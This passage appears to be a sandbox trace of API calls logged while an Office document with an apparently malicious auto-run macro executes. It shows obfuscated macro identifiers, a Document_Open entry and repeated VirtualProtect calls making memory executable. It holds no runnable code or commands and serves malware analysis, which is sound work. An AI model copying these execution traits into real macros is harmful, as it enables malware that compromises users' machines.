dwCmpFlags=0x10001, lpString1="\x97\x96\x97\x97\x96", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0110.644] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x97\x96\x96\x97\x96\x96\x96\x97\x97\x96\x97\x96\x96\x96\x97\x97\x96\x96\x96\x96\x97\x97\x97\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0110.644] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97\x97\x96\x96\x96\x96\x96\x97\x96\x96\x97\x97\x97\x97\x97\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0110.644] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="kODKXd767UH", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 3 [0110.644] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97\x96\x97\x96\x96\x96\x97\x97\x96\x97\x96\x97\x96\x96\x97\x97\x97\x96\x97\x97\x97\x97\x96\x96\x97\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0110.644] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x97\x96\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0110.644] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97\x97\x97\x96\x96\x97\x97\x97\x97\x96\x96\x97\x96\x96\x97\x97\x97\x96\x97\x97\x97\x96\x96", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0110.644] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="Document_Open", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 3 [0110.644] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x97\x96\x96\x97\x96\x96\x96\x96", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0110.644] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97\x96\x96\x96\x97\x96\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0110.644] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97\x96\x97\x96\x96\x96\x96\x96\x96\x97\x96\x97\x97\x96\x97\x97\x96\x96\x96\x96\x96\x96\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0110.644] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97\x97\x96\x97\x97\x96\x97\x97\x96\x97\x97\x97\x97\x96\x96\x97\x96\x97\x97\x97\x97\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0110.644] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x96\x96\x96\x96\x96\x96\x97\x97\x96\x97\x97\x97\x97\x97\x96\x97\x96", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0110.644] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x97\x96", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0110.644] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x97\x97\x97\x96\x97\x96\x97\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0110.644] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97\x97\x97\x96\x96\x96\x97\x96\x96\x97\x97\x96\x96\x97\x96\x96\x97\x96\x97\x96\x97\x97\x97\x96\x96\x96\x97\x97\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0110.644] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97\x96\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0110.644] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97\x97\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0110.644] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97\x96\x97\x97\x97\x96\x96\x96\x97\x96\x97\x97\x97\x96\x97\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0110.644] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x97\x97\x96\x97\x96\x97\x96\x96\x96\x97\x96\x96\x96\x96\x96\x97\x97\x96\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0110.644] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0110.645] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x96\x96\x96\x97\x96\x96\x97\x97\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0110.645] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0110.645] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0110.645] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x96\x97\x97\x97\x97\x96\x96\x97\x97\x97\x96\x96\x97\x97\x96\x97\x96\x96\x97\x96\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0110.645] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97\x97\x96\x96", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0110.645] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97\x96", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0110.645] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x96\x97\x96\x96\x97\x97\x97\x96\x97\x97\x97\x97\x96\x97\x97\x97\x97\x97\x97\x97\x96", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0110.645] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97\x96\x97\x97\x96\x97\x96\x96\x97\x96\x96\x96\x97\x96\x96\x97\x96\x96\x96\x96\x96\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0110.645] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97\x96\x97\x97\x97\x96\x96\x97\x97\x96\x97\x96\x96\x97\x97\x96\x97\x96\x96\x96\x96\x97\x96\x97\x96\x97\x96\x96\x96", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0110.645] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x97\x97\x97\x96\x96\x97\x96\x97\x96\x96\x96\x96\x97\x97\x96\x96\x96", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0110.645] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x97\x97\x97\x96\x97\x97\x97\x97\x96\x96\x97\x96\x97\x96\x96\x97\x96\x96\x97\x97\x96\x96\x97\x97\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0110.645] CRetailMalloc_Free () returned 0x1 [0110.645] longjmp () [0110.645] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BuiltInDocumentProperties", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0110.645] CRetailMalloc_Alloc () returned 0xc856d60 [0110.645] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BuiltInDocumentProperties", cchWideChar=-1, lpMultiByteStr=0xc856d60, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BuiltInDocumentProperties", lpUsedDefaultChar=0x0) returned 26 [0110.645] CRetailMalloc_Free () returned 0x1 [0110.645] longjmp () [0111.877] SafeArrayDestroyData (psa=0xc8779a8) returned 0x0 [0111.877] SafeArrayDestroyDescriptor (psa=0xc8779a8) returned 0x0 [0111.877] GetAsyncKeyState (vKey=3) returned 0 [0111.932] CRetailMalloc_Alloc () returned 0xf3767c0 [0111.933] memcpy (in: _Dst=0xd015168, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0111.933] memcpy (in: _Dst=0xd015270, _Src=0x1978c4, _Size=0xc | out: _Dst=0xd015270) returned 0xd015270 [0111.933] memcpy (in: _Dst=0xd015168, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0111.933] memcpy (in: _Dst=0xd015168, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0111.933] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x97\x96\x96\x96\x96\x96\x97\x96\x96\x97\x97\x97\x97\x97\x97", cchCount1=-1, lpString2="\x96\x96\x97\x96\x96\x96\x97\x97\x97\x96\x96\x96\x97\x96\x97\x96", cchCount2=-1) returned 3 [0111.933] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x96\x97\x97\x97\x96\x96\x96\x97\x96\x97\x97\x97\x96\x97\x97", cchCount1=-1, lpString2="\x96\x96\x97\x96\x96\x96\x97\x97\x97\x96\x96\x96\x97\x96\x97\x96", cchCount2=-1) returned 3 [0111.934] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11302db6, cbMultiByte=17, lpWideCharStr=0x1976c4, cchWideChar=18 | out: lpWideCharStr="––—–––———–––—–—–") returned 17 [0111.934] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c0982, cbMultiByte=17, lpWideCharStr=0x197724, cchWideChar=18 | out: lpWideCharStr="––—–––———–––—–—–") returned 17 [0111.934] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c0982, cbMultiByte=17, lpWideCharStr=0x197724, cchWideChar=18 | out: lpWideCharStr="––—–––———–––—–—–") returned 17 [0111.934] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c0982, cbMultiByte=17, lpWideCharStr=0x197724, cchWideChar=18 | out: lpWideCharStr="––—–––———–––—–—–") returned 17 [0111.934] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x97\x96\x96\x96\x96\x96\x97\x96\x96\x97\x97\x97\x97\x97\x97", cchCount1=-1, lpString2="\x96\x96\x97\x96\x96\x96\x97\x97\x97\x96\x96\x96\x97\x96\x97\x96", cchCount2=-1) returned 3 [0111.934] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x96\x97\x97\x97\x96\x96\x96\x97\x96\x97\x97\x97\x96\x97\x97", cchCount1=-1, lpString2="\x96\x96\x97\x96\x96\x96\x97\x97\x97\x96\x96\x96\x97\x96\x97\x96", cchCount2=-1) returned 3 [0111.934] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c0982, cbMultiByte=17, lpWideCharStr=0x197724, cchWideChar=18 | out: lpWideCharStr="––—–––———–––—–—–") returned 17 [0111.934] CRetailMalloc_Alloc () returned 0xc872b80 [0111.934] _mbscpy_s (in: _Dst=0xc872b80, _DstSizeInBytes=0x11, _Src=0x112c0982 | out: _Dst=0xc872b80) returned 0x0 [0111.935] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c0afe, cbMultiByte=24, lpWideCharStr=0x197734, cchWideChar=25 | out: lpWideCharStr="_B_var_––—–––———–––—–—–") returned 24 [0111.935] _mbscpy_s (in: _Dst=0x19779c, _DstSizeInBytes=0x11, _Src=0x112c0982 | out: _Dst=0x19779c) returned 0x0 [0111.935] CRetailMalloc_Free () returned 0x1 [0111.935] memcpy (in: _Dst=0xd015270, _Src=0xd015270, _Size=0xc | out: _Dst=0xd015270) returned 0xd015270 [0111.935] memcpy (in: _Dst=0xd015168, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0111.935] memcpy (in: _Dst=0xd01516c, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xd01516c) returned 0xd01516c [0111.935] memcpy (in: _Dst=0xd015168, _Src=0x197714, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0111.935] memcpy (in: _Dst=0xd015168, _Src=0x197714, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0111.935] memcpy (in: _Dst=0xd015168, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0111.935] memcpy (in: _Dst=0xd015168, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0111.935] memcpy (in: _Dst=0xf376838, _Src=0x197944, _Size=0x18 | out: _Dst=0xf376838) returned 0xf376838 [0111.935] CRetailMalloc_Realloc () returned 0xf3767c0 [0111.935] CRetailMalloc_Free () returned 0x1 [0111.935] GetCurrentProcess () returned 0xffffffff [0111.935] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601714, dwSize=0x14) returned 1 [0111.935] VirtualProtect (in: lpAddress=0xf601714, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.936] GetCurrentProcess () returned 0xffffffff [0111.936] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601715, dwSize=0x2) returned 1 [0111.936] GetCurrentProcess () returned 0xffffffff [0111.936] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601734, dwSize=0x14) returned 1 [0111.936] VirtualProtect (in: lpAddress=0xf601734, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.937] GetCurrentProcess () returned 0xffffffff [0111.937] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601735, dwSize=0x2) returned 1 [0111.937] GetCurrentProcess () returned 0xffffffff [0111.937] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601754, dwSize=0x14) returned 1 [0111.937] VirtualProtect (in: lpAddress=0xf601754, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.937] GetCurrentProcess () returned 0xffffffff [0111.937] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601755, dwSize=0x2) returned 1 [0111.937] GetCurrentProcess () returned 0xffffffff [0111.937] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601774, dwSize=0x14) returned 1 [0111.937] VirtualProtect (in: lpAddress=0xf601774, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.938] GetCurrentProcess () returned 0xffffffff [0111.938] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601775, dwSize=0x2) returned 1 [0111.938] GetCurrentProcess () returned 0xffffffff [0111.938] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601794, dwSize=0x14) returned 1 [0111.938] VirtualProtect (in: lpAddress=0xf601794, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.938] GetCurrentProcess () returned 0xffffffff [0111.938] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601795, dwSize=0x2) returned 1 [0111.938] GetCurrentProcess () returned 0xffffffff [0111.938] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017b4, dwSize=0x14) returned 1 [0111.938] VirtualProtect (in: lpAddress=0xf6017b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.952] GetCurrentProcess () returned 0xffffffff [0111.952] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017b5, dwSize=0x2) returned 1 [0111.952] GetCurrentProcess () returned 0xffffffff [0111.952] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017d4, dwSize=0x14) returned 1 [0111.952] VirtualProtect (in: lpAddress=0xf6017d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.953] GetCurrentProcess () returned 0xffffffff [0111.954] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017d5, dwSize=0x2) returned 1 [0111.954] GetCurrentProcess () returned 0xffffffff [0111.954] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017f4, dwSize=0x14) returned 1 [0111.954] VirtualProtect (in: lpAddress=0xf6017f4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.955] GetCurrentProcess () returned 0xffffffff [0111.955] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017f5, dwSize=0x2) returned 1 [0111.955] GetCurrentProcess () returned 0xffffffff [0111.955] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601814, dwSize=0x14) returned 1 [0111.955] VirtualProtect (in: lpAddress=0xf601814, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.956] GetCurrentProcess () returned 0xffffffff [0111.956] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601815, dwSize=0x2) returned 1 [0111.956] GetCurrentProcess () returned 0xffffffff [0111.956] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601834, dwSize=0x14) returned 1 [0111.956] VirtualProtect (in: lpAddress=0xf601834, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.956] GetCurrentProcess () returned 0xffffffff [0111.956] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601835, dwSize=0x2) returned 1 [0111.956] GetCurrentProcess () returned 0xffffffff [0111.956] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601854, dwSize=0x14) returned 1 [0111.956] VirtualProtect (in: lpAddress=0xf601854, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.957] GetCurrentProcess () returned 0xffffffff [0111.957] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601855, dwSize=0x2) returned 1 [0111.957] GetCurrentProcess () returned 0xffffffff [0111.957] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601874, dwSize=0x14) returned 1 [0111.957] VirtualProtect (in: lpAddress=0xf601874, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.957] GetCurrentProcess () returned 0xffffffff [0111.957] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601875, dwSize=0x2) returned 1 [0111.957] GetCurrentProcess () returned 0xffffffff [0111.957] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0048, dwSize=0x14) returned 1 [0111.957] VirtualProtect (in: lpAddress=0xf5d0048, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.958] GetCurrentProcess () returned 0xffffffff [0111.958] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0049, dwSize=0x2) returned 1 [0111.958] GetCurrentProcess () returned 0xffffffff [0111.958] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0068, dwSize=0x14) returned 1 [0111.958] VirtualProtect (in: lpAddress=0xf5d0068, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.958] GetCurrentProcess () returned 0xffffffff [0111.958] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0069, dwSize=0x2) returned 1 [0111.958] GetCurrentProcess () returned 0xffffffff [0111.958] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0088, dwSize=0x14) returned 1 [0111.958] VirtualProtect (in: lpAddress=0xf5d0088, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.959] GetCurrentProcess () returned 0xffffffff [0111.959] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0089, dwSize=0x2) returned 1 [0111.959] GetCurrentProcess () returned 0xffffffff [0111.959] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00a8, dwSize=0x14) returned 1 [0111.959] VirtualProtect (in: lpAddress=0xf5d00a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.959] GetCurrentProcess () returned 0xffffffff [0111.959] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00a9, dwSize=0x2) returned 1 [0111.959] GetCurrentProcess () returned 0xffffffff [0111.959] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00c8, dwSize=0x14) returned 1 [0111.959] VirtualProtect (in: lpAddress=0xf5d00c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.962] GetCurrentProcess () returned 0xffffffff [0111.962] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00c9, dwSize=0x2) returned 1 [0111.962] GetCurrentProcess () returned 0xffffffff [0111.962] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00e8, dwSize=0x14) returned 1 [0111.962] VirtualProtect (in: lpAddress=0xf5d00e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.963] GetCurrentProcess () returned 0xffffffff [0111.963] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00e9, dwSize=0x2) returned 1 [0111.963] GetCurrentProcess () returned 0xffffffff [0111.963] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0108, dwSize=0x14) returned 1 [0111.963] VirtualProtect (in: lpAddress=0xf5d0108, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.964] GetCurrentProcess () returned 0xffffffff [0111.964] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0109, dwSize=0x2) returned 1 [0111.964] GetCurrentProcess () returned 0xffffffff [0111.964] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0128, dwSize=0x14) returned 1 [0111.964] VirtualProtect (in: lpAddress=0xf5d0128, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.964] GetCurrentProcess () returned 0xffffffff [0111.964] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0129, dwSize=0x2) returned 1 [0111.964] GetCurrentProcess () returned 0xffffffff [0111.964] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0148, dwSize=0x14) returned 1 [0111.964] VirtualProtect (in: lpAddress=0xf5d0148, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.965] GetCurrentProcess () returned 0xffffffff [0111.965] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0149, dwSize=0x2) returned 1 [0111.965] GetCurrentProcess () returned 0xffffffff [0111.965] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0168, dwSize=0x14) returned 1 [0111.965] VirtualProtect (in: lpAddress=0xf5d0168, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.965] GetCurrentProcess () returned 0xffffffff [0111.965] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0169, dwSize=0x2) returned 1 [0111.965] GetCurrentProcess () returned 0xffffffff [0111.965] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0188, dwSize=0x14) returned 1 [0111.965] VirtualProtect (in: lpAddress=0xf5d0188, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.966] GetCurrentProcess () returned 0xffffffff [0111.966] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0189, dwSize=0x2) returned 1 [0111.966] GetCurrentProcess () returned 0xffffffff [0111.966] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01a8, dwSize=0x14) returned 1 [0111.966] VirtualProtect (in: lpAddress=0xf5d01a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.966] GetCurrentProcess () returned 0xffffffff [0111.966] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01a9, dwSize=0x2) returned 1 [0111.966] GetCurrentProcess () returned 0xffffffff [0111.966] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01c8, dwSize=0x14) returned 1 [0111.966] VirtualProtect (in: lpAddress=0xf5d01c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.967] GetCurrentProcess () returned 0xffffffff [0111.967] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01c9, dwSize=0x2) returned 1 [0111.967] GetCurrentProcess () returned 0xffffffff [0111.967] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01e8, dwSize=0x14) returned 1 [0111.967] VirtualProtect (in: lpAddress=0xf5d01e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.967] GetCurrentProcess () returned 0xffffffff [0111.967] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01e9, dwSize=0x2) returned 1 [0111.967] GetCurrentProcess () returned 0xffffffff [0111.967] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0208, dwSize=0x14) returned 1 [0111.967] VirtualProtect (in: lpAddress=0xf5d0208, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.968] GetCurrentProcess () returned 0xffffffff [0111.968] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0209, dwSize=0x2) returned 1 [0111.968] GetCurrentProcess () returned 0xffffffff [0111.968] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0228, dwSize=0x14) returned 1 [0111.968] VirtualProtect (in: lpAddress=0xf5d0228, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.968] GetCurrentProcess () returned 0xffffffff [0111.968] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0229, dwSize=0x2) returned 1 [0111.968] GetCurrentProcess () returned 0xffffffff [0111.968] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4868, dwSize=0x14) returned 1 [0111.968] VirtualProtect (in: lpAddress=0xc8b4868, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.969] GetCurrentProcess () returned 0xffffffff [0111.969] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4869, dwSize=0x2) returned 1 [0111.969] GetCurrentProcess () returned 0xffffffff [0111.969] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4888, dwSize=0x14) returned 1 [0111.969] VirtualProtect (in: lpAddress=0xc8b4888, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.969] GetCurrentProcess () returned 0xffffffff [0111.969] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4889, dwSize=0x2) returned 1 [0111.969] GetCurrentProcess () returned 0xffffffff [0111.969] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b48a8, dwSize=0x14) returned 1 [0111.969] VirtualProtect (in: lpAddress=0xc8b48a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.970] GetCurrentProcess () returned 0xffffffff [0111.970] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b48a9, dwSize=0x2) returned 1 [0111.971] GetAsyncKeyState (vKey=3) returned 0 [0111.971] 